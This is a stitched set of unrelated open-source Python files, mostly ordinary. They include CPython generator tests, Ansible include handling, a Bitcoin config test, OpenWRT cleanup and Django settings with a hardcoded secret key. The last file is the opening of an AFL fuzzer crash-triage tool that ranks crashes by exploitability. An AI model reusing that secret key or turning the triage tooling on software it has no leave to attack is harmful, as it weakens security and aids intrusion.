sys.stderr.getvalue().startswith( ... "Exception RuntimeError: 'generator ignored GeneratorExit' in " ... ) True >>> sys.stderr = old And errors thrown during closing should propagate: >>> def f(): ... try: yield ... except GeneratorExit: ... raise TypeError("fie!") >>> g = f() >>> next(g) >>> g.close() Traceback (most recent call last): ... TypeError: fie! Ensure that various yield expression constructs make their enclosing function a generator: >>> def f(): x += yield >>> type(f()) <class 'generator'> >>> def f(): x = yield >>> type(f()) <class 'generator'> >>> def f(): lambda x=(yield): 1 >>> type(f()) <class 'generator'> >>> def f(): x=(i for i in (yield) if (yield)) >>> type(f()) <class 'generator'> >>> def f(d): d[(yield "a")] = d[(yield "b")] = 27 >>> data = [1,2] >>> g = f(data) >>> type(g) <class 'generator'> >>> g.send(None) 'a' >>> data [1, 2] >>> g.send(0) 'b' >>> data [27, 2] >>> try: g.send(1) ... except StopIteration: pass >>> data [27, 27] """ refleaks_tests = """ Prior to adding cycle-GC support to itertools.tee, this code would leak references. We add it to the standard suite so the routine refleak-tests would trigger if it starts being uncleanable again. >>> import itertools >>> def leak(): ... class gen: ... def __iter__(self): ... return self ... def __next__(self): ... return self.item ... g = gen() ... head, tail = itertools.tee(g) ... g.item = head ... return head >>> it = leak() Make sure to also test the involvement of the tee-internal teedataobject, which stores returned items. >>> item = next(it) This test leaked at one point due to generator finalization/destruction. It was copied from Lib/test/leakers/test_generator_cycle.py before the file was removed. >>> def leak(): ... def gen(): ... while True: ... yield g ... g = gen() >>> leak() This test isn't really generator related, but rather exception-in-cleanup related. The coroutine tests (above) just happen to cause an exception in the generator's __del__ (tp_del) method. We can also test for this explicitly, without generators. We do have to redirect stderr to avoid printing warnings and to doublecheck that we actually tested what we wanted to test. >>> import sys, io >>> old = sys.stderr >>> try: ... sys.stderr = io.StringIO() ... class Leaker: ... def __del__(self): ... raise RuntimeError ... ... l = Leaker() ... del l ... err = sys.stderr.getvalue().strip() ... err.startswith( ... "Exception RuntimeError: RuntimeError() in <" ... ) ... err.endswith("> ignored") ... len(err.splitlines()) ... finally: ... sys.stderr = old True True 1 These refleak tests should perhaps be in a testfile of their own, test_generators just happened to be the test that drew these out. """ __test__ = {"tut": tutorial_tests, "pep": pep_tests, "email": email_tests, "fun": fun_tests, "syntax": syntax_tests, "conjoin": conjoin_tests, "weakref": weakref_tests, "coroutine": coroutine_tests, "refleaks": refleaks_tests, } # Magic test name that regrtest.py invokes *after* importing this module. # This worms around a bootstrap problem. # Note that doctest and regrtest both look in sys.argv for a "-v" argument, # so this works as expected in both ways of running regrtest. def test_main(verbose=None): from test import support, test_generators support.run_doctest(test_generators, verbose) # This part isn't needed for regrtest, but for running the test directly. if __name__ == "__main__": test_main(1)
Alberto-Beralix/Beralix
refs/heads/master
i386-squashfs-root/usr/lib/python2.7/dist-packages/papyon/gnet/proxy/abstract.py
2
../../../../../../share/pyshared/papyon/gnet/proxy/abstract.py
smiller171/ansible
refs/heads/devel
lib/ansible/playbook/included_file.py
7
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os from ansible.errors import AnsibleError from ansible.template import Templar class IncludedFile: def __init__(self, filename, args, task): self._filename = filename self._args = args self._task = task self._hosts = [] def add_host(self, host): if host not in self._hosts: self._hosts.append(host) def __eq__(self, other): return other._filename == self._filename and other._args == self._args def __repr__(self): return "%s (%s): %s" % (self._filename, self._args, self._hosts) @staticmethod def process_include_results(results, tqm, iterator, loader, variable_manager): included_files = [] for res in results: if res._task.action == 'include': if res._task.loop: if 'results' not in res._result: continue include_results = res._result['results'] else: include_results = [ res._result ] for include_result in include_results: # if the task result was skipped or failed, continue if 'skipped' in include_result and include_result['skipped'] or 'failed' in include_result: continue original_task = iterator.get_original_task(res._host, res._task) task_vars = variable_manager.get_vars(loader=loader, play=iterator._play, host=res._host, task=original_task) templar = Templar(loader=loader, variables=task_vars) include_variables = include_result.get('include_variables', dict()) if 'item' in include_result: task_vars['item'] = include_variables['item'] = include_result['item'] if original_task: if original_task._task_include: # handle relative includes by walking up the list of parent include # tasks and checking the relative result to see if it exists parent_include = original_task._task_include while parent_include is not None: parent_include_dir = templar.template(os.path.dirname(parent_include.args.get('_raw_params'))) include_target = templar.template(include_result['include']) if original_task._role: new_basedir = os.path.join(original_task._role._role_path, 'tasks', parent_include_dir) include_file = loader.path_dwim_relative(new_basedir, 'tasks', include_target) else: include_file = loader.path_dwim_relative(loader.get_basedir(), parent_include_dir, include_target) if os.path.exists(include_file): break else: parent_include = parent_include._task_include elif original_task._role: include_target = templar.template(include_result['include']) include_file = loader.path_dwim_relative(original_task._role._role_path, 'tasks', include_target) else: include_file = loader.path_dwim(include_result['include']) else: include_file = loader.path_dwim(include_result['include']) include_file = templar.template(include_file) inc_file = IncludedFile(include_file, include_variables, original_task) try: pos = included_files.index(inc_file) inc_file = included_files[pos] except ValueError: included_files.append(inc_file) inc_file.add_host(res._host) return included_files
chaincoin/chaincoin
refs/heads/0.18
test/functional/feature_includeconf.py
19
#!/usr/bin/env python3 # Copyright (c) 2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Tests the includeconf argument Verify that: 1. adding includeconf to the configuration file causes the includeconf file to be loaded in the correct order. 2. includeconf cannot be used as a command line argument. 3. includeconf cannot be used recursively (ie includeconf can only be used from the base config file). 4. multiple includeconf arguments can be specified in the main config file. """ import os from test_framework.test_framework import BitcoinTestFramework class IncludeConfTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = False self.num_nodes = 1 def setup_chain(self): super().setup_chain() # Create additional config files # - tmpdir/node0/relative.conf with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: f.write("uacomment=relative\n") # - tmpdir/node0/relative2.conf with open(os.path.join(self.options.tmpdir, "node0", "relative2.conf"), "w", encoding="utf8") as f: f.write("uacomment=relative2\n") with open(os.path.join(self.options.tmpdir, "node0", "bitcoin.conf"), "a", encoding='utf8') as f: f.write("uacomment=main\nincludeconf=relative.conf\n") def run_test(self): self.log.info("-includeconf works from config file. subversion should end with 'main; relative)/'") subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative)/") self.log.info("-includeconf cannot be used as command-line arg") self.stop_node(0) self.nodes[0].assert_start_raises_init_error(extra_args=["-includeconf=relative2.conf"], expected_msg="Error parsing command line arguments: -includeconf cannot be used from commandline; -includeconf=relative2.conf") self.log.info("-includeconf cannot be used recursively. subversion should end with 'main; relative)/'") with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "a", encoding="utf8") as f: f.write("includeconf=relative2.conf\n") self.start_node(0) subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative)/") self.stop_node(0, expected_stderr="warning: -includeconf cannot be used from included files; ignoring -includeconf=relative2.conf") self.log.info("-includeconf cannot contain invalid arg") # Commented out as long as we ignore invalid arguments in configuration files #with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: # f.write("foo=bar\n") #self.nodes[0].assert_start_raises_init_error(expected_msg="Error reading configuration file: Invalid configuration value foo") self.log.info("-includeconf cannot be invalid path") os.remove(os.path.join(self.options.tmpdir, "node0", "relative.conf")) self.nodes[0].assert_start_raises_init_error(expected_msg="Error reading configuration file: Failed to include configuration file relative.conf") self.log.info("multiple -includeconf args can be used from the base config file. subversion should end with 'main; relative; relative2)/'") with open(os.path.join(self.options.tmpdir, "node0", "relative.conf"), "w", encoding="utf8") as f: # Restore initial file contents f.write("uacomment=relative\n") with open(os.path.join(self.options.tmpdir, "node0", "bitcoin.conf"), "a", encoding='utf8') as f: f.write("includeconf=relative2.conf\n") self.start_node(0) subversion = self.nodes[0].getnetworkinfo()["subversion"] assert subversion.endswith("main; relative; relative2)/") if __name__ == '__main__': IncludeConfTest().main()
bnewbold/openwrt
refs/heads/rooter
scripts/dl_cleanup.py
131
#!/usr/bin/env python """ # OpenWRT download directory cleanup utility. # Delete all but the very last version of the program tarballs. # # Copyright (c) 2010 Michael Buesch <mb@bu3sch.de> """ import sys import os import re import getopt # Commandline options opt_dryrun = False def parseVer_1234(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) |\ (int(match.group(5)) << 16) return (progname, progversion) def parseVer_123(match, filepath): progname = match.group(1) try: patchlevel = match.group(5) except (IndexError), e: patchlevel = None if patchlevel: patchlevel = ord(patchlevel[0]) else: patchlevel = 0 progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) |\ patchlevel return (progname, progversion) def parseVer_12(match, filepath): progname = match.group(1) try: patchlevel = match.group(4) except (IndexError), e: patchlevel = None if patchlevel: patchlevel = ord(patchlevel[0]) else: patchlevel = 0 progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ patchlevel return (progname, progversion) def parseVer_r(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) return (progname, progversion) def parseVer_ymd(match, filepath): progname = match.group(1) progversion = (int(match.group(2)) << 64) |\ (int(match.group(3)) << 48) |\ (int(match.group(4)) << 32) return (progname, progversion) def parseVer_GIT(match, filepath): progname = match.group(1) st = os.stat(filepath) progversion = int(st.st_mtime) << 64 return (progname, progversion) extensions = ( ".tar.gz", ".tar.bz2", ".orig.tar.gz", ".orig.tar.bz2", ".zip", ".tgz", ".tbz", ) versionRegex = ( (re.compile(r"(.+)[-_]([0-9a-fA-F]{40,40})"), parseVer_GIT), # xxx-GIT_SHASUM (re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)\.(\d+)"), parseVer_1234), # xxx-1.2.3.4 (re.compile(r"(.+)[-_](\d\d\d\d)-?(\d\d)-?(\d\d)"), parseVer_ymd), # xxx-YYYY-MM-DD (re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)(\w?)"), parseVer_123), # xxx-1.2.3a (re.compile(r"(.+)[-_](\d+)_(\d+)_(\d+)"), parseVer_123), # xxx-1_2_3 (re.compile(r"(.+)[-_](\d+)\.(\d+)(\w?)"), parseVer_12), # xxx-1.2a (re.compile(r"(.+)[-_]r?(\d+)"), parseVer_r), # xxx-r1111 ) blacklist = [ ("linux", re.compile(r"linux-.*")), ("gcc", re.compile(r"gcc-.*")), ("wl_apsta", re.compile(r"wl_apsta.*")), (".fw", re.compile(r".*\.fw")), (".arm", re.compile(r".*\.arm")), (".bin", re.compile(r".*\.bin")), ("rt-firmware", re.compile(r"RT[\d\w]+_Firmware.*")), ] class EntryParseError(Exception): pass class Entry: def __init__(self, directory, filename): self.directory = directory self.filename = filename self.progname = "" self.fileext = "" for ext in extensions: if filename.endswith(ext): filename = filename[0:0-len(ext)] self.fileext = ext break else: print self.filename, "has an unknown file-extension" raise EntryParseError("ext") for (regex, parseVersion) in versionRegex: match = regex.match(filename) if match: (self.progname, self.version) = parseVersion( match, directory + "/" + filename + self.fileext) break else: print self.filename, "has an unknown version pattern" raise EntryParseError("ver") def deleteFile(self): path = (self.directory + "/" + self.filename).replace("//", "/") print "Deleting", path if not opt_dryrun: os.unlink(path) def __eq__(self, y): return self.filename == y.filename def __ge__(self, y): return self.version >= y.version def usage(): print "OpenWRT download directory cleanup utility" print "Usage: " + sys.argv[0] + " [OPTIONS] <path/to/dl>" print "" print " -d|--dry-run Do a dry-run. Don't delete any files" print " -B|--show-blacklist Show the blacklist and exit" print " -w|--whitelist ITEM Remove ITEM from blacklist" def main(argv): global opt_dryrun try: (opts, args) = getopt.getopt(argv[1:], "hdBw:", [ "help", "dry-run", "show-blacklist", "whitelist=", ]) if len(args) != 1: usage() return 1 except getopt.GetoptError: usage() return 1 directory = args[0] for (o, v) in opts: if o in ("-h", "--help"): usage() return 0 if o in ("-d", "--dry-run"): opt_dryrun = True if o in ("-w", "--whitelist"): for i in range(0, len(blacklist)): (name, regex) = blacklist[i] if name == v: del blacklist[i] break else: print "Whitelist error: Item", v,\ "is not in blacklist" return 1 if o in ("-B", "--show-blacklist"): for (name, regex) in blacklist: print name return 0 # Create a directory listing and parse the file names. entries = [] for filename in os.listdir(directory): if filename == "." or filename == "..": continue for (name, regex) in blacklist: if regex.match(filename): if opt_dryrun: print filename, "is blacklisted" break else: try: entries.append(Entry(directory, filename)) except (EntryParseError), e: pass # Create a map of programs progmap = {} for entry in entries: if entry.progname in progmap.keys(): progmap[entry.progname].append(entry) else: progmap[entry.progname] = [entry,] # Traverse the program map and delete everything but the last version for prog in progmap: lastVersion = None versions = progmap[prog] for version in versions: if lastVersion is None or version >= lastVersion: lastVersion = version if lastVersion: for version in versions: if version != lastVersion: version.deleteFile() if opt_dryrun: print "Keeping", lastVersion.filename return 0 if __name__ == "__main__": sys.exit(main(sys.argv))
Dexhub/MTX
refs/heads/master
ext/ply/ply/__init__.py
838
# PLY package # Author: David Beazley (dave@dabeaz.com) __all__ = ['lex','yacc']
JoeWoo/grpc
refs/heads/master
src/python/grpcio_test/grpc_test/_adapter/_c_test.py
17
# Copyright 2015, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import time import unittest from grpc._adapter import _c from grpc._adapter import _types class CTypeSmokeTest(unittest.TestCase): def testCompletionQueueUpDown(self): completion_queue = _c.CompletionQueue() del completion_queue def testServerUpDown(self): completion_queue = _c.CompletionQueue() serv = _c.Server(completion_queue, []) del serv del completion_queue def testChannelUpDown(self): channel = _c.Channel('[::]:0', []) del channel if __name__ == '__main__': unittest.main(verbosity=2)
jacobajit/ion
refs/heads/master
intranet/apps/events/notifications.py
1
# -*- coding: utf-8 -*- from django.conf import settings from django.core.urlresolvers import reverse from ..notifications.emails import email_send def event_approval_request(request, event): subject = "Event Approval Request from {}".format(event.user) emails = [settings.APPROVAL_EMAIL] base_url = request.build_absolute_uri(reverse('index')) data = {"event": event, "info_link": request.build_absolute_uri(reverse("event", args=[event.id])), "base_url": base_url} email_send("events/emails/admin_approve.txt", "events/emails/admin_approve.html", data, subject, emails)
nonsk131/USRP2016
refs/heads/master
fitMultinest_triplet.py
1
import matplotlib matplotlib.use('Agg') from isochrones.dartmouth import Dartmouth_Isochrone from isochrones.starmodel import StarModel from isochrones.observation import ObservationTree import pandas as pd import matplotlib.pyplot as plt import sys #from mpi4py import MPI #comm = MPI.COMM_WORLD #rank = comm.Get_rank() def get_index(n): if n < 10: return '000' + str(n) elif n < 100: return '00' + str(n) elif n < 1000: return '0' + str(n) else: return str(n) n = sys.argv[1] i = get_index(n) df = pd.read_csv('/tigress/np5/dataFrame/df_triplet_test{}.csv'.format(i)) #------------------------------------------------------------------------------- #triplet0 - all in same system dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet0'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet0.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet0_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet0_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet1 - M1,M2 bound - M3 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,0,1]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet1'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet1.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet1_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet1_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet2 - M1,M3 bound - M2 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,1,0]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet2'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet2.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet2_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet2_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet3 - M2,M3 bound - M1 unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,1,1]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet3'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet3.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet3_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet3_corner_observed.png'.format(i)) plt.close(fig) #------------------------------------------------------------------------------- #triplet4 - M1,M2,M3 all unbound dar = Dartmouth_Isochrone() t = ObservationTree.from_df(df, name='test{}'.format(i)) t.define_models(dar, index=[0,1,2]) mod = StarModel(dar, obs=t) mod.fit_multinest(n_live_points=1000, basename='/tigress/np5/chains/test{}_triplet4'.format(i)) #if rank == 0: f1 = open('/tigress/np5/evidence_triplet4.txt','a') evi = mod.evidence evi = str(evi) f1.write('case{}: '.format(i) + evi + '\n') f1.close() fig = mod.corner_physical(props=['mass', 'distance', 'AV']) fig.savefig('/tigress/np5/figures/test{}_triplet4_corner_physical.png'.format(i)) plt.close(fig) fig = mod.corner_observed() fig.savefig('/tigress/np5/figures/test{}_triplet4_corner_observed.png'.format(i)) plt.close(fig)
tardisgallifrey/python
refs/heads/master
hello.py
1
#!/usr/bin/python print "hello world"
xNUTs/PTVS
refs/heads/master
Python/Tests/TestData/DjangoProjectWithSubDirectory/project/config/settings.py
18
# Django settings for DjangoProjectWithSubDirectory project. DEBUG = True TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('Your Name', 'your_email@example.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': '', # Or path to database file if using sqlite3. 'USER': '', # Not used with sqlite3. 'PASSWORD': '', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale. USE_L10N = True # If you set this to False, Django will not use timezone-aware datetimes. USE_TZ = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/home/media/media.lawrence.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://media.lawrence.com/media/", "http://example.com/media/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. # Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/home/media/media.lawrence.com/static/" STATIC_ROOT = 'test_static' # URL prefix for static files. # Example: "http://media.lawrence.com/static/" STATIC_URL = '/static/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # Make this unique, and don't share it with anybody. SECRET_KEY = 'n(bd1f1c%e8=_xad02x5qtfn%wgwpi492e$8_erx+d)!tpeoim' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # Uncomment the next line for simple clickjacking protection: # 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'config.urls' # Python dotted path to the WSGI application used by Django's runserver. WSGI_APPLICATION = 'config.wsgi.application' TEMPLATE_DIRS = ( # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', ) # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
floyd-fuh/afl-crash-analyzer
refs/heads/master
AflCrashAnalyzer.py
1
#!/usr/bin/env python2.7 ''' AFL crash analyzer, crash triage for the American Fuzzy Lop fuzzer Copyright (C) 2015 floyd This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Created on Apr 13, 2015 @author: floyd, http://floyd.ch, @floyd_ch ''' from modules.FileDuplicateFinder import FileDuplicateFinder from modules.SignalFinder import SignalFinder from modules.OutputFinder import OutputFinder from modules.InputMinimizer import InputMinimizer from modules.FeelingLuckyExploiter import FeelingLuckyExploiter from modules.ExploitableGdbPlugin import ExploitableGdbPlugin from utilities.Logger import Logger import os import glob def analyze_output_and_exploitability(config, signal_finder, uninteresting_signals, message_prefix=""): for signal, signal_folder in signal_finder.get_folder_paths_for_signals_if_exist(uninteresting_signals): skip = False for cat in ExploitableGdbPlugin.get_classifications(): if os.path.exists(os.path.join(signal_folder, cat)): Logger.warning("Seems like there are already exploitability analysis results, skipping. If you want to rerun: rm -r %s" % os.path.join(signal_folder, cat)) skip = True if not skip: Logger.info(message_prefix, "Discover stdout, stderr, gdb and ASAN output (signal %s)" % signal) wildcard_for_run_output_files = os.path.join(signal_folder, "*" + config.run_extension) if glob.glob(wildcard_for_run_output_files): Logger.warning("Seems like there are already results from running the binaries, skipping. If you want to rerun: rm", wildcard_for_run_output_files) else: of = OutputFinder(config, signal_folder) of.do_sane_output_runs() Logger.info(message_prefix, "Analyzing exploitability (signal %s)" % signal) egp = ExploitableGdbPlugin(config, signal_folder) egp.divide_by_exploitability() def main(): # Read the README before you start. Logger.info("Setting up configuration") gdb_script_64bit = r"""printf "[+] Disabling verbose and complaints\n" set verbose off set complaints 0 printf "[+] Backtrace:\n" bt printf "[+] info reg:\n" info reg printf "[+] exploitable:\n" exploitable printf "[+] disassemble $rip, $rip+16:\n" disassemble $rip, $rip+16 printf "[+] list\n" list """ gdb_script_32bit = r"""printf "[+] Disabling verbose and complaints\n" set verbose off set complaints 0 printf "[+] Backtrace:\n" bt printf "[+] info reg:\n" info reg printf "[+] exploitable:\n" exploitable printf "[+] disassemble $eip, $eip+16:\n" disassemble $eip, $eip+16 printf "[+] list\n" list """ # TODO: Make sure gdb script doesn't abort on error # ignoring errors in gdb scripts: http://stackoverflow.com/questions/17923865/gdb-stops-in-a-command-file-if-there-is-an-error-how-to-continue-despite-the-er gdb_script_32bit_noerror = r"""python def my_ignore_errors(arg): try: gdb.execute("print \"" + "Executing command: " + arg + "\"") gdb.execute (arg) except: gdb.execute("print \"" + "ERROR: " + arg + "\"") my_ignore_errors("p p") my_ignore_errors("p p->v1") gdb.execute("quit") """ where_this_python_script_lives = os.path.dirname(os.path.realpath(__file__)) gdb_command = "/usr/bin/gdb" #gdb_command_osx = "/opt/local/bin/gdb-apple" #TODO: For some reason the ASAN environment variables are not correctly set when given to the subprocess module... so let's just set it in parent process already: os.environ['ASAN_SYMBOLIZER_PATH'] = "/usr/bin/llvm-symbolizer-3.4" os.environ['ASAN_OPTIONS'] = "symbolize=1:redzone=512:quarantine_size=512Mb:exitcode=1:abort_on_error=1" env={"ASAN_SYMBOLIZER_PATH": "/usr/bin/llvm-symbolizer-3.4", "ASAN_OPTIONS": "symbolize=1:redzone=512:quarantine_size=512Mb:exitcode=1:abort_on_error=1"} ### # This import decides which testcase/binary we want to run! ### from testcases.ffmpeg.Config import create_config #from testcases.ffmpeg.Config import create_config #see CrashAnalysisConfig for more options that get passed on by create_config chosen_config = create_config(where_this_python_script_lives, env=env, gdb_script=gdb_script_32bit, gdb_binary=gdb_command) chosen_config.sanity_check() # Logger.info("Input crashes directory operations") # Logger.info("Removing README.txt files") fdf = FileDuplicateFinder(chosen_config, chosen_config.original_crashes_directory) fdf.remove_readmes() Logger.info("Removing duplicates from original crashes folder (same file size + MD5)") fdf.delete_duplicates_recursively() Logger.info("Renaming files from original crashes folder so that the filename is a unique identifier. This allows us to copy all crash files into one directory (eg. for tmin output) if necessary, without name collisions") fdf.rename_same_name_files() #OR: #Logger.info("Renaming all files to numeric values, as some programs prefer no special chars in filenames and might require a specific file extension") #fdf.rename_all_files(".png") # Logger.info("Finding interesting signals (all crashes)") # sf_all_crashes = SignalFinder(chosen_config) if os.path.exists(chosen_config.default_signal_directory): Logger.warning("Seems like all crashes were already categorized by signal, skipping. If you want to rerun: rm -r", chosen_config.default_signal_directory) else: Logger.debug("Dividing files to output folder according to their signal") sf_all_crashes.divide_by_signal() #Interestings signals: negative on OSX, 129 and above sometimes for Linux on the shell (depending on used mechanism) #Uninteresting signals: We usually don't care about signals 0, 1, 2, etc. up to 128 uninteresting_signals = range(0, 129) analyze_output_and_exploitability(chosen_config, sf_all_crashes, uninteresting_signals, message_prefix="Interesting signals /") Logger.info("Interesting signals / Minimizing input (afl-tmin)") if os.path.exists(chosen_config.default_minimized_crashes_directory): Logger.warning("Seems like crashes were already minimized, skipping. If you want to rerun: rm -r", 